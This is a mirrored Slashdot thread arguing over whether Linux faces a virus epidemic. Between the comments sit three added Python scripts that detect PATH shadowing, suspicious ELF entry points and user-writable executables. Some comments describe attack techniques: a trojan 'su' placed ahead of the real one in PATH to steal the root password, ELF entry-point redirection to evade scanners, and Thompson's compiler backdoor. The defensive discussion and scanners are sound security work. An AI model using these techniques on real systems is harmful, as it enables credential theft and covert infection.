Slashdot Mirror


Garfinkel Warns Of Linux Virus "Epidemic"

An anonymous coward says: "Simson Garfinkel has an opinion piece at SecurityFocus called "The Coming Linux Plague." He argues that Linux is no less susceptible to viruses than Windows, and that an epidemic is inevitable." I'm sure most of us have read his books. What do you think of this commentary?

25 of 432 comments

  1. Linux Viruses by jd · · Score: 3
    Yes, I believe Linux Viruses will take over the world!

    What crap!

    Stop and think for a moment. To produce a binary Linux virus (as opposed to a script virus), you have to have a virus capable of handling a.out and elf binaries. It has to support Linux 1.x.y and Linux 2.x.y kernels. It has to support libc5, glibc 2.0 and glibc 2.1. It has to support ix86, IA64, ARM, Alpha, Sparc, Sparc64, m68k, ppc, S/360 and any other architecture Linux supports.

    Why? Because if it can't run, it won't spread. And because you can't know what the virus will run on ahead of time, it would have to run on EVERYTHING to survive.

    Then, of course, if it's doing low-level appends, it's got to support ext2fs, ext3fs, reiserfs, xfs, jfs, ufs, umsdos, and any other filing system that Linux could be run off of.

    Script viruses don't have it any easier. You've no way of knowing if bash 1, bash 2, csh, tcsh, ksh, zsh, perl, tcl/tk, python, or any other given shell is present, never mind used. Nor can you rely on a given version being present. Perl and Tcl are extremely version-sensitive, making viruses in these languages either dependent on there being specific versions installed, or having support for many many versions.

    Then, there's always the problems produced by the International Kernel Patch (which can encrypt partitions for you), Tripwire and its many clones, the various Linux Kernel hardening projects, etc. If a virus can survive all of that, it almost deserves to conquer the world.

    Windows viruses have proliferated because there is a high degree of uniformity at the low-levels. This just doesn't exist in Linux (thank God!) and probably never could, at this point.

    Any claim that someone could =write= a Linux virus which is not so specific as to be useless is plain stupid. Such an animal does not and CAN NOT exist. Linux is far too diverse, now.

    Some people may have heard of the concept of "biodiversity", whereby living organisms protect themselves from real diseases or attacks by being as different and diverse as possible. Linux has gained that same protection, now, and is immune to all-encompassing attacks. Only specific attacks are of any use, and the more diverse Linux is, the more specific those attacks need to be. It could reach the point where they can only run on one machine. OOOOH! SCARY!

    --
    It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
  2. MISSING THE POINT by Bilbo · · Score: 3
    You're missing the whole point of the article. What the author is trying to point out is, the reason we don't see Linux viruses is not because Linux is "immune", but because (a) current users are mostly techie types who understand basic security, and more important, (b) the pool of targets is smaller.

    Think about it... I'm some bored script kiddie who wants my 15 minutes of fame. Am I going to try to write a virus to infect hundreds of systems, or hundreds of thousands?

    The point the author was trying to make is that the landscape is changing. As we are celebrating all the new people who are starting to use Linux, and all the easy-to-install distributions, the "average user" is changing. You no longer need a degree in CS to simply use a Linux system. Just as there are plenty of unsophisticated Windows users, there will be unsophisticated Linux users. Add to this the hordes of home users signing up every day for always-on fat pipe Internet connections. There are ways to worm your way into a Linux system, especially if the "administrator" is clueless about security. (Read: buffer over-run bugs, SMTP vulnerabilities, etc...)

    I'm not about to plunk down $50 for a questionable Linux "security" product, but I do try to keep an eye on what's happening to my system. More important, distributions like RedHat and ilk need to carefully consider what their default configurations look like, knowing that setting up maximum security as the base configuration is a wise thing to do. If users need more flexibility, then let them learn about what the tradeoffs are, so they can open up only the doors they need. Support organizations need to make security a top priority, making sure that everyone -- even the clueless newby -- can keep their systems up to date with the latest security patches.

    Security -- no matter what your OS is -- doesn't come for free.

    --
    Your Servant, B. Baggins
  3. It will happen - but not as bad as windows by szyzyg · · Score: 3

    Viruses in various forms will propagate - there's loads of programmes which are vulnerable. But I don't see the huge problems with macro viruses occurring, there won't be any 'melissa'.

    Trojans are already turning up here and there.

    The trick is not to assume that something is more secure than windows, if you end up being complacent about security threats then you get what you deserve. You don't need to be paranoid either, and being paranoid doesn't mean spending money to support the anti-virus software industry. It just means making sure your code doesn't increase the risk to the whole.

    So - if you spot a problem - then talk to the people who should deal with it.

    1. Re:It will happen - but not as bad as windows by QuantumG · · Score: 3

      really the key here is to keep linux viruses open source and support linux virus developers.. it's really quite comparable to the biological warfare debate.. if your own people aren't making them then how will you know how to combat what the enemy is doing? The most revealing linux virus research can be found at:

      http://www.big.net.au/~silvio/

      --
      How we know is more important than what we know.
  4. Re:An EFFECTIVE Linux virus is very difficult by Goonie · · Score: 3
    As linux becomes more popular binary distributions will become common.

    Agreed - in fact, they already are

    Download a binary that has a virus and run it as a normal user. OK - where from? ftp.debian.org? If I check the signature on the package I can be sure that it's as the package author sent it out, and I trust that package author not to have virii on his/her machine. I (as a programmer), wouldn't download binaries from an untrusted source (as I might get a trojan, which could do far more vicious things than a virus), but a newbie might and would get infected.

    Lets say the user now compiles some code, that binary will be infected, the user puts the binary into a tar ball and shoves it onto their ftp site for distribution.. the virus spreads.

    The type of people who download untrusted binaries don't tend to upload binaries either.

    I still remain unconvinced about the abilities of virii to do real damage in the Linux environment (heck, binary virii haven't really caused problems in the Windows environment for years). However, you make some good points. Now that these vulnerabilities in the ELF file format and the Linux kernel have been pointed out, is there any work being done to close them?

    --

    Any sufficiently advanced technology is indistinguishable from a rigged demo
    --Andy Finkel (J. Klass?)
  5. Re:How? by Goonie · · Score: 3

    A cursory browse at the example virii there (I didn't read all the papers, I admit), doesn't explain how a virus could gain root privileges (which it requires to propagate effectively), without being executed by root. Could you give me a pointer to a specific paper?

    --

    Any sufficiently advanced technology is indistinguishable from a rigged demo
    --Andy Finkel (J. Klass?)
  6. Re:Head in the sand? by arivanov · · Score: 3
    If you think Linux is safe... you're wrong.

    Your statement is overrated. Here is why:

    In order for a virus to proliferate it needs to execute and infect executables. Even on "home" linux systems the executables are 99.999% not owned by the user. The user has no +w on them. So unless the virus attempts an exploit it will not be able to infect executables. There are a few notable exceptions of course:

    • College campuses and enterprise networks with a d...head sysadmin. Users install their own software in their home dirs. Guess what happens next.
    • Debian and Co and users in the group staff. /usr/local/bin is writable. Oh-oh...
    • Developer users that write their own software in C. Yeah viruses here. On a linux system. Right... What have I been smoking anyway...

    In order for computer viruses to proliferate you need to follow the same rules as in the living world. Namely you need the infection rate/death rate to exceed a certain threshold. All the cases above give you thresholds for good size local outbursts, but not for an epidemic. Which is not the case with Windows 9x, MacOS and their predecessors.

    There are a few notable examples when the above situation will drastically change. The most important one is: "NO EXECUTABLE DOCUMENT FORMATS!!!". If MS Word is ported, or a similar abomination becomes a predominant software product on Linux, then there will be trouble. Because there will be "executable" user-writable formats floating all over the place. Then the threshold for self-sustained infection will be exceeded.

    --
    Baker's Law: Misery no longer loves company. Nowadays it insists on it
    http://www.sigsegv.cx/
  7. Possible, but far far more difficult. by FallLine · · Score: 3
    The file system, while not perfect, does complicate things significantly. The hax0r, to do real damage, must find some way to get his code executed as root. This means he must:


    a) Convince the user to run his stuff as root.
    - This of course will not work against most intelligent people
    - If, and when, such viruses start emerging, the current Linux using populace can be educated about this.

    b) Have the user unknowingly run an exploit (to get root privs) plus virus code.
    - The problem with this, though clearly possible, is that, in order to gain huge distribution, it needs a relatively stable set of exploits. Most known exploits do get patched relatively quickly, and many current users are sufficiently diligent to apply them. Here again, a Linux virus/hacking epidemic would get most users to act in order. Things such as automated patch retrieval/installation (or, at the very least, email) could also be implemented. Furthermore, this revolves more around the stupidity of the vendors (read: distributions) than it does the actual design flaw. I might be alone, but I think the vast majority of these exploits could have been prevented if they really put any effort into security. The bottom line is: Instead of trying to 'detect' and 'fight' each virus individually, you attack their points of entry directly (knocking out hundreds of would-be viruses for each buggy program you shut down)

    c) Have the user run non-root code, which actually trojans password-entering programs, and wraps the IO to the real program, while trapping the input. For example, create your own su program in ~bin/, change PATH precedence such that ~bin/ precedes the real su's path (e.g., /sbin, /usr/sbin, etc.) Wait till the user runs 'su -'

    - Possible, and much harder to prevent. But this depends on the user acting in a certain way.

    Furthermore, the very nature of the Linux community poses a real obstacle to any virus's success. Whether or not people admit it, Microsoft plays a large contributing role in the success of its many viruses. Where Microsoft is unresponsive to most security problems, the linux community is very responsive. A published virus is likely to result in a detailed plan of action against future attacks -- Microsoft simply isn't interested in this unless it can be proven that it'd hurt or help their bottom line significantly. Right now, to the best of my knowledge, most common windows exploits either come in shareware type programs (downloaded from some random site on the internet, or from a friend) or they're macro viruses (totally not an issue for linux yet). Linux, of course, is all about sharing software over the internet, as a result programs and code tend to receive a considerable amount of scrutiny, even if only from 1% of the users (especially if primarily distributed as source). These users can, and do, in turn, make a stink if something looks foul, making it unlikely to get archived on official sites and what not.

    In conclusion, I don't have the time to analyze each and every difference between Linux and Windows; however, the differences between them will make Linux a relatively virus free platform. That being said, I do believe a few linux viruses will emerge pretty soon. Perhaps one or two will really take off, but the rest will fail. After that, the community and vendors at large will mend their ways, and stem the "reproduction" of viruses down to negligible levels.
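    The PATH-precedence trick in point (c) above is easy to check for. The script below is an added example, not code from the post or from any project it mentions: it resolves a command the way the shell does (first matching directory in PATH wins) and flags the case where the winning copy sits in a directory the current user can write to while a later PATH entry holds another copy. The demo() layout, directory names and the hypothetical wrapper file are constructed for the example; the permission checks use os.access, which answers for the invoking user and reports everything writable when run as root.

```python
"""Detect a command resolving to a user-writable directory ahead of the system copy (added example)."""
import os
import tempfile


def resolve_candidates(command, path_entries):
    """Return every PATH directory holding an executable `command`, in shell lookup order."""
    hits = []
    for d in path_entries:
        candidate = os.path.join(d, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            hits.append({"dir": d, "path": candidate,
                         "dir_writable": os.access(d, os.W_OK),
                         "file_writable": os.access(candidate, os.W_OK)})
    return hits


def shadow_report(command, path_str):
    """First hit wins. Flag it when a user-writable directory (or file) supplied it and a
    later PATH entry also holds the command: the wrapper-before-the-real-binary pattern."""
    entries = [e or "." for e in path_str.split(os.pathsep)]  # empty entry means cwd
    hits = resolve_candidates(command, entries)
    if not hits:
        return {"resolved": None, "shadowed": False, "hits": hits}
    first = hits[0]
    shadowed = (first["dir_writable"] or first["file_writable"]) and len(hits) > 1
    return {"resolved": first["path"], "shadowed": shadowed, "hits": hits}


def demo():
    """Constructed layout: a user-writable ~/bin/su listed before a read-only 'system' sbin/su.
    Both files are placeholders and are never executed."""
    root = tempfile.mkdtemp()
    user_bin = os.path.join(root, "home", "user", "bin")
    sys_sbin = os.path.join(root, "sbin")
    os.makedirs(user_bin)
    os.makedirs(sys_sbin)
    for d in (user_bin, sys_sbin):
        p = os.path.join(d, "su")
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, 0o755)
    # Make the "system" copy read-only so its bits say non-writable (root bypasses DAC anyway).
    os.chmod(os.path.join(sys_sbin, "su"), 0o555)
    os.chmod(sys_sbin, 0o555)
    bad_path = os.pathsep.join([user_bin, sys_sbin])   # ~/bin first: the attack precondition
    good_path = os.pathsep.join([sys_sbin, user_bin])  # system dirs first
    return {"bad": shadow_report("su", bad_path), "good": shadow_report("su", good_path)}


if __name__ == "__main__":
    for label, report in demo().items():
        print(label, "->", report["resolved"], "shadowed" if report["shadowed"] else "ok")
```

    To audit a real shell, call shadow_report("su", os.environ["PATH"]) and compare against the output of `type -a su`; the fix is the usual one, system directories before anything under $HOME and no "." or empty entries in PATH.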
  8. Contagion by The+Famous+Brett+Wat · · Score: 3
    Boot Viruses are virtually extinct in their pure form. They relied on people booting off floppy disks. Several different floppy disks. The only boot viruses left are file viruses that get their dirty hooks into the boot sector as a means of making sure they are installed. We can ignore this category -- it's dead.

    File Viruses are still out there, of course, but not nearly as much as they used to be. A "pure" file virus is one that inserts itself into some other executable (or executables in general). These are less of a problem than they used to be because software is generally obtained off a CD-ROM or remote download site, and viruses can't touch these files (unless the software company or FTP hoster does something really dumb). Not much actual copying of executables off one machine onto another is done anymore, which is how these things spread. Anyone old enough to remember when we used to copy executables as a matter of course? Come on, 'fess up! Gee -- I can remember those quaint old programs which you didn't "install" as such because they consisted of one executable.

    Macro Viruses are still big, though. And Microsoft's feature-driven focus will assure that this problem only gets worse. The big problem is that their software is so ubiquitous, making them a big easy target. And they keep doing really dumb stuff. Everything keeps getting more and more "active". They love that word, don't they? "Active" means "I'm a big gaping security hole just waiting to be exploited!" Linux won't have this problem until either Microsoft starts porting their stuff, or we get virus-compatible equivalents, or somehow the marketroids take over Linux software development and we throw all common sense out the window. I mean seriously, if someone actually wrote a mail reader for Linux that was so helpful that it says, "hey -- here's some new mail for you! Let me immediately display it in this window for you! And run this javascript thing in it for you!" -- would anyone use it? Any takers? Maybe if you run it under jail, right?

    Trojans on the other hand, have come into their own. I still see the damn Happy '99 trojan wandering around now and then. The trojan that emails itself to everyone in your address book is one of the more popular forms. The great thing about trojans is that they rely on the human to be the weak link, not some software hole that would get closed up the moment it was discovered (or at least would if the software in question was open source). Human stupidity is here to stay! It's going to decrease, but only because people are now growing up with email and learn the tricks at a young age. It is, however, entirely feasible to write a trojan email attachment for Linux. It's not likely to be worth anyone's while, though, because of the small target market and high likelihood that the user has at least half a clue with regards to this sort of thing. In any case, the user isn't likely to be running an email reader which makes activating the attachment a "double click" operation, and which address book are you going to read?

    In summary, I don't see a big target market for viruses here. I think that worms are more likely to be the issue. That, and security holes that get exploited manually. These all come under the banner of cracking, rather than viruses (although worms are a sort of overlap point). Another possibility, as others have suggested, is back-door code being placed in a kernel module or something which explicitly creates an exploitable weakness. We'll see if the "bug-finding is parallelable" principle of Linux development also maps to the finding of deliberate security holes. I think accidental ones are likely to be the real problem, however.

    -- The Famous Brett Watson

    --
    proof, n. A demonstration that a conclusion is implied by certain premises and axioms.
  9. Re:Head in the sand?.....maybe..... by Sun+Tzu · · Score: 3

    Color me wrong, but why haven't the "half-dozen or so known Linux viruses" been detectable on the virometer yet? Sure, the boom is "coming", but why haven't the viruses that are already here had any success?

  10. Re:An EFFECTIVE Linux virus is very difficult by QuantumG · · Score: 3

    sure.. the same guy who wrote these viruses has written scanners for each of them and is working on a "generic scanner" which detects such things as "entrypoint in the data segment", which he then defeats by overwriting the start of the original entrypoint with a jump to the data segment, etc. It's an arms race of sorts and the first step is to identify the possible techniques.

    As for programmers not downloading binaries. There are times when you need a binary because there is no source. If you are downloading the binary from redhat.com, you may think that it is safe but without getting down with the instructions and checking out what it does you can't be certain. Good reverse engineering tools are still lacking and are desperately needed for security purposes. If it is possible for an ordinary user to get infected then it is not a giant leap to see a programmer getting infected and from there it is not difficult to see a distribution getting infected and a whole lot of users getting infected and thus a whole lot of programmers getting infected - especially with most of the linux community being programmers (of one sort or another).

    --
    How we know is more important than what we know.
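    The "entrypoint in the data segment" heuristic and the jump-based evasion described in the comment above can both be shown in a few dozen lines. What follows is an added example written for this page, not the scanner or the viruses referred to in the post: it parses the ELF64 header and program headers, locates the PT_LOAD segment containing e_entry, and reports an entry point that lands in a writable segment; as a second stage it decodes a relative jmp (E9 rel32) at the entry point and flags it when the target is in a writable or unmapped segment, which is the case the evasion produces. The three sample images are constructed in memory by build_elf64() and contain no real code; a real infector could also mark its segment executable or change flags, so this is one signal, not a verdict.

```python
"""Heuristic ELF64 entry-point scanner (added example; not the scanner from the page)."""
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS64 = 2
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
EHDR_FMT = "<16sHHIQQQIHHHHHH"        # Elf64_Ehdr, little-endian
PHDR_FMT = "<IIQQQQQQ"                # Elf64_Phdr
EHDR_SIZE = struct.calcsize(EHDR_FMT)  # 64
PHDR_SIZE = struct.calcsize(PHDR_FMT)  # 56


def load_segments(data):
    """Return (e_entry, [PT_LOAD segments]) from a little-endian ELF64 image."""
    if len(data) < EHDR_SIZE or data[:4] != ELF_MAGIC or data[4] != ELFCLASS64:
        raise ValueError("not an ELF64 image")
    hdr = struct.unpack_from(EHDR_FMT, data, 0)
    e_entry, e_phoff, e_phentsize, e_phnum = hdr[4], hdr[5], hdr[9], hdr[10]
    segs = []
    for i in range(e_phnum):
        p_type, p_flags, p_offset, p_vaddr, _, p_filesz, p_memsz, _ = struct.unpack_from(
            PHDR_FMT, data, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD:
            segs.append({"flags": p_flags, "offset": p_offset, "vaddr": p_vaddr,
                         "filesz": p_filesz, "memsz": p_memsz})
    return e_entry, segs


def segment_for(segs, addr):
    """The PT_LOAD segment whose memory range covers `addr`, or None."""
    for s in segs:
        if s["vaddr"] <= addr < s["vaddr"] + s["memsz"]:
            return s
    return None


def read_at(data, seg, addr, n):
    """File bytes backing virtual address `addr` inside `seg` (empty if beyond p_filesz)."""
    rel = addr - seg["vaddr"]
    if rel + n > seg["filesz"]:
        return b""
    return data[seg["offset"] + rel:seg["offset"] + rel + n]


def scan_entry_point(data):
    """Flag an entry point that lands in, or immediately jumps into, a writable segment."""
    entry, segs = load_segments(data)
    seg = segment_for(segs, entry)
    if seg is None:
        return {"verdict": "suspicious", "reason": "entry point outside every PT_LOAD segment"}
    if seg["flags"] & PF_W:
        return {"verdict": "suspicious", "reason": "entry point in a writable segment"}
    if not seg["flags"] & PF_X:
        return {"verdict": "suspicious", "reason": "entry point in a non-executable segment"}
    # Second stage: x86-64 jmp rel32 (opcode E9) at the entry point aimed outside the text segment.
    code = read_at(data, seg, entry, 5)
    if len(code) == 5 and code[0] == 0xE9:
        target = entry + 5 + struct.unpack("<i", code[1:5])[0]
        tseg = segment_for(segs, target)
        if tseg is None or tseg["flags"] & PF_W:
            return {"verdict": "suspicious",
                    "reason": "entry point jumps to %#x in a writable or unmapped segment" % target}
    return {"verdict": "clean", "reason": "entry point in a read-only executable segment"}


def build_elf64(entry, segments):
    """Construct a tiny ELF64 image from (flags, vaddr, bytes) tuples. Sample data only, not a real binary."""
    phoff = EHDR_SIZE
    body_off = phoff + PHDR_SIZE * len(segments)
    phdrs, body = [], b""
    for flags, vaddr, content in segments:
        off = body_off + len(body)
        phdrs.append(struct.pack(PHDR_FMT, PT_LOAD, flags, off, vaddr, vaddr,
                                 len(content), len(content), 0x1000))
        body += content
    ident = ELF_MAGIC + bytes([ELFCLASS64, 1, 1, 0]) + b"\0" * 8
    ehdr = struct.pack(EHDR_FMT, ident, 2, 62, 1, entry, phoff, 0, 0,
                       EHDR_SIZE, PHDR_SIZE, len(segments), 64, 0, 0)
    return ehdr + b"".join(phdrs) + body


# Constructed samples: 16 bytes of RET as "text", 16 zero bytes as "data".
TEXT, DATA = 0x401000, 0x404000
CLEAN = build_elf64(TEXT, [(PF_R | PF_X, TEXT, b"\xc3" * 16), (PF_R | PF_W, DATA, b"\0" * 16)])
# Entry moved into the writable data segment, the pattern the first-generation scanner looks for.
ENTRY_IN_DATA = build_elf64(DATA + 4, [(PF_R | PF_X, TEXT, b"\xc3" * 16), (PF_R | PF_W, DATA, b"\0" * 16)])
# Entry left in text, but its first instruction replaced by a jmp into the data segment.
JMP_TO_DATA = build_elf64(TEXT, [(PF_R | PF_X, TEXT, b"\xe9" + struct.pack("<i", DATA - (TEXT + 5)) + b"\xc3" * 11),
                                 (PF_R | PF_W, DATA, b"\0" * 16)])

if __name__ == "__main__":
    for name, img in (("clean", CLEAN), ("entry-in-data", ENTRY_IN_DATA), ("jmp-to-data", JMP_TO_DATA)):
        print(name, scan_entry_point(img))
```

    Run against real files with scan_entry_point(open(path, "rb").read()); the arms race the comment describes continues from here, since an infector that maps its body into a read-only executable segment passes both checks and needs a different signal (for example an entry point far from the segment containing main's caller, or section-header inconsistencies).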
  11. More like... by DerMarlboro · · Score: 3

    rpm -ivh stoned.rpm
    Missing dependencies:
    glibc6
    imlib
    virus.so.4

    But seriously, we scoff at this because most of us have never had a virus on a linux box. I know I never have, and I don't know anybody who has. But don't let this lull you into a false sense of security. Murphy's law has been proven true over and over and over again.

    Linux is a very large and complex system. And as we all know, in any sufficiently complex system, there are bugs. If we get arrogant, those bugs will be exploited.

    On a lighter note, the thoroughly open nature of linux means that any virus written will be rendered useless in the next patch. But I don't think it's a problem we should ignore until systems are going down left and right.

  12. Diversity is good - don't live in a monoculture .. by taniwha · · Score: 3
    Biology teaches us a lot

    Bad things to do around viruses:

    • Never change
    • always use the same software
    • encourage monopolies
    • don't build up an immune system (security, anti-viral programs)
    Good things:
    • change often, adapt
    • everyone use different software (diversity of distributions, kernels, desktop environments is a VERY good thing)
    • security
    • actively hunt down stuff in your system that changes unexpectedly
    • stay away from those who seem to get infected a lot
    You get the idea - M$'s world lives in a monoculture - just like a genetically engineered crop where everything is the same they are prey to that one viral mutation that can wipe out everyone
  13. Hmmm,did anyone notice.... by flyneye · · Score: 3

    Using basic powers of observation we can see:
    1. This guy is a security consultant, one who makes money off computer users' misery.
    2. In order to market many products and/or services a demand must be created if in fact it does not exist.
    3. Software is created by people who hold an interest in creating it, such as an out of work security clown creating a virus, were it possible.
    4. If you take off his disguise of glasses and that ridiculous wig, you could see we are dealing with Elmer FUD.

    --
    *Repent!Quit Your Job!Slack Off!The World Ends Tomorrow and You May Die!
  14. Re:Hard to imagine by BMazurek · · Score: 3
    I'm a bit skeptical about this backdoor possibility in official versions of the kernel (or gcc or some other important piece of free s/w). People have been suggesting it for years, but it's never actually happened.

    Never actually happened, eh? Taken from the Jargon Dictionary entry for Back Door:

    Historically, back doors have often lurked in systems longer than anyone expected or planned, and a few have become widely known. Ken Thompson's 1983 Turing Award lecture to the ACM admitted the existence of a back door in early Unix versions that may have qualified as the most fiendishly clever security hack of all time. In this scheme, the C compiler contained code that would recognize when the `login' command was being recompiled and insert some code recognizing a password chosen by Thompson, giving him entry to the system whether or not an account had been created for him.

    Normally such a back door could be removed by removing it from the source code for the compiler and recompiling the compiler. But to recompile the compiler, you have to use the compiler -- so Thompson also arranged that the compiler would recognize when it was compiling a version of itself, and insert into the recompiled compiler the code to insert into the recompiled `login' the code to allow Thompson entry -- and, of course, the code to recognize itself and do the whole thing again the next time around! And having done this once, he was then able to recompile the compiler from the original sources; the hack perpetuated itself invisibly, leaving the back door in place and active but with no trace in the sources.

  15. Re:Viruses will come...Free Software isn't ready! by Felinoid · · Score: 4

    I have known professional programmers and hobbyists and in my view professionals are MORE likely to write viruses than less likely.

    Add to the mix that back doors in software are written almost exclusively by professional programmers working on high end systems.

    This is just my point of view but it seems to me that viruses are written to attack an operating system and/or platform a person dislikes.
    A professional is more likely to have access to a system he dislikes than a hobbyist who would presumably only have the system he likes the most.

    Unix admins have long had to use systems they disliked. In some cases a Unix admin prefers one *nix platform but gets stuck with a different *nix platform. He wouldn't write viruses on the company's own system because that would get him fired but he would unleash it "into the wild" if possible.
    In over 30 years.. with every motivation... and a lot of Unix hobbyists (in case you prefer to believe viruses only come from hobbyists) a Unix virus is virtually unheard of.

    To back up my claim that over the years Unix people are every bit as likely to make viruses as anyone else.. even more so... look at the sheer number of trojan horses written for Unix. Far outnumbering those for DOS.
    There are several reasons for that.. One is that Unix people are not worried about trojans coming back to haunt them since they run something different at home. If they use computers at home at all.
    (Think 30 years ago... the standard admin in 1970 used CP/M at home if he had a computer at all.. the standard admin in 2000 almost certainly has a server class system at home)

    Note shortly after the first Linux virus was uncovered one of the big antivirus companies made a virus scanner for Linux. Then the virus was destroyed rendering the product useless.

    There is some Linux antivirus software out there. They don't do anything useful since there's no viruses to stop. But some hobbyists are serious tweaks.
    Check out freshmeat and take a look at the antivirus software selection
    Check out freshmeat and take a look at the antivirus software selection

    --
    I don't actually exist.
  16. Hard to imagine by jw3 · · Score: 4
    OK, so I'm just a lame biologist, still -- I can't quite imagine how this would happen. I mean, of course you can write viruses for Linux, but to spread them would be very hard. I can only judge from my own case: places where I get software for Linux I can count on the fingers of one hand -- in 95% of the cases, it's a SuSE mirror. Yes, I can imagine some evil-minded soul who tricked SuSE into getting an infected package. But even though I could have been infected then, SuSE would be able to quickly track the virus and submit sufficient patches. This is not Windows world, where you get the programs from your friends or some obscure web pages: usually, programs are distributed much more professionally than in the case of Windows programs.

    Of course, I can imagine worms which trick the users in, for example, executing a shell script which then mails messages using sendmail and ~/Mail, ~/.tinrc, /etc/passwd, etc. However, Unix provides nice means to control the in- and outgoing e-mail, and the root account would be in that case untouchable - I think.

    But how about some evil-minded hacker (yes, you read it right: hacker, not cracker), who contributes for example to the kernel effort, and installs somewhere in an obscure driver a nice backdoor, and waits till a new major stable version of Linux comes out? Say, 2.4.0. Then all the people who download this kernel are vulnerable: the hacker waits till the 2.4 becomes popular, and then spreads the worm for the designed wormhole. Anyway, in that case he would be probably finished...

    Well, I don't know. I'm not much of a hacker. But I think that getting a virus is in the case of Linux much less likely than in the case of Windows. And besides -- I haven't seen a virus for Windows ever since 1996 or something, so is there really a thing to worry about?

    Regards,

    January

  17. As long as MD5, RSA, and PGP sigs remain... by Netsnipe · · Score: 4

    ...impossible to counterfeit, then the smarter half of the whole Linux community (who verify packages before installation) should be safe from viruses and trojans. Let's cross our fingers and hope the heavily used mirrors don't let their security down. Perhaps a review board of mirror site security should be established. Even the most paranoid should be able to sleep at night knowing that someone checked their mirror before they downloaded that last package.
    On the issue of trojans, no one seems to have brought up the issue of trojans that could possibly make unannounced changes to source code as it is being compiled. Wouldn't that be harder to detect than a trojan, as signatures can't protect uncompressed source? Imagine your copy of Tripwire, Necruss, GnuPG or perhaps even the kernel being compromised at compilation time, meaning that your security could be compromised without being able to realise it or detect it until it is too late? Now that's scary.
    For the really paranoid, I recommend that you check out Kurt Seifried's extremely comprehensive Linux Administrator's Security Guide (aka. LASG) at https://www.seifried.org/lasg/
    If followed, it can put anyone's mind at ease.

    --
    -- "I can't tell the future, I just work there." -- The Doctor
  18. An EFFECTIVE Linux virus is very difficult by Goonie · · Score: 5
    After all, it's not too terribly hard to write a virus for any computer operating system

    That may be the case, but it's pretty damned tough to write an effective virus that will propagate with any efficiency on a Linux box.

    I'll first discuss binary viruses, then macro virii, as they are separate issues. All system-installed programs are owned by root (modulo some daemons and the like owned by administrative accounts), so to infect "ls" or "emacs" the virus would either have to use some exploit to gain root privileges, or get itself installed suid root. Root exploits tend to get closed, pronto. Whilst newbies wouldn't check to see if a program installed itself suid root, experienced users would, and would let the world know if a paint program from www.reallycoolsoftware.com was installing itself suid root for no good reason. So propagation by infecting system software would be pretty damn difficult.

    What could a virus then do to propagate itself without root privileges? It could infect any program it had write permissions to - that is, any executable owned by the user, or set group or world writable. Newbies don't tend to have executables that they own, group-writable executables are rare (and not a great idea), and world-writable executables are extremely bad practice. Not much room for propagating there.

    Even worse for the virus, binaries don't tend to get shared around much in the Linux community. Binaries tend to get distributed using CD-ROMs, distribution ftp sites, and possibly project ftp sites - none of the rampant floppy-swapping that made the viruses of the 80's and early 90's so prevalent. Nor do Linux email programs allow the blithe execution of binaries as many Windows mailers do.

    Therefore, I consider it extremely unlikely that Linux binary virii will be able to propagate effectively.

    Macro virii are a different proposition. File permissions are not such a defence here. However, these beasties rely on macro languages which were enabled by default, which allow arbitrary macro code to be executed on loading a document. If auto-executable macros are disabled by default (or banned outright), and macro languages restricted in their power to prevent them altering documents other than the one they are embedded in, the macro virus cannot propagate itself. Why can Linux applications do this readily, while Windows is more restricted? Simple - because the foreknowledge of what has happened in the Windows world is allowing Linux applications to be designed with macro-virus proofing in mind.

    In summary, Linux is a damned hard target for virus writers. Next time Mr Garfinkel tries to drum up some business for himself, he might consider doing a little more research.

    --

    Any sufficiently advanced technology is indistinguishable from a rigged demo
    --Andy Finkel (J. Klass?)
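    Both comment 6 (arivanov's three exceptions: software in home directories, a group-writable /usr/local/bin, developers' own builds) and comment 18 above reduce the non-root infection surface to one question: which executables can this user write to? The script below is an added example, not code from either post; it walks a directory tree and lists regular executables writable by a given uid and group set, using only the discretionary mode bits (root bypasses them, and ACLs are not consulted). The demo() tree, its file names and the 0o755/0o775/0o777 modes are constructed for the example; since every file in a temp directory is owned by whoever runs it, the "root-owned" cases are modelled by asking about a different uid.

```python
"""Enumerate executables a user could overwrite, i.e. the non-root infection surface (added example)."""
import os
import stat
import tempfile


def writable_by(mode, file_uid, file_gid, uid, gids):
    """Discretionary permission bits only: owner, then group, then other (root bypasses all of it)."""
    if uid == file_uid:
        return bool(mode & stat.S_IWUSR)
    if file_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def is_executable_file(mode):
    """Regular file with any execute bit set (symlinks and directories are skipped)."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


def infectable_executables(root, uid, gids):
    """Paths under `root` of regular executables that `uid` (a member of `gids`) may write."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if is_executable_file(st.st_mode) and writable_by(st.st_mode, st.st_uid, st.st_gid, uid, gids):
                found.append(p)
    return sorted(found)


def demo():
    """Constructed tree. All files are owned by the current user; 'system' ownership is simulated
    by querying for a stranger uid. Placeholder contents are never executed."""
    root = tempfile.mkdtemp()
    layout = {
        "usr/bin/ls": 0o755,            # ordinary system binary
        "usr/local/bin/tool": 0o775,    # group-writable: the Debian 'staff' case
        "home/user/bin/mygame": 0o755,  # software the user built and installed under $HOME
        "home/user/notes.txt": 0o644,   # not executable, must be ignored
        "tmp/dropped": 0o777,           # world-writable executable, the worst case
    }
    for rel, mode in layout.items():
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)
    me = os.getuid()
    grp = os.lstat(os.path.join(root, "usr/bin/ls")).st_gid
    stranger = me + 1  # some other uid: a non-owner looking at files it does not own
    rel = lambda paths: [os.path.relpath(p, root) for p in paths]
    return {
        "stranger": rel(infectable_executables(root, stranger, set())),       # only world-writable
        "staff_member": rel(infectable_executables(root, stranger, {grp})),   # plus group-writable
        "owner": rel(infectable_executables(root, me, {grp})),                # everything with u+w
    }


if __name__ == "__main__":
    for who, paths in demo().items():
        print(who, paths)
```

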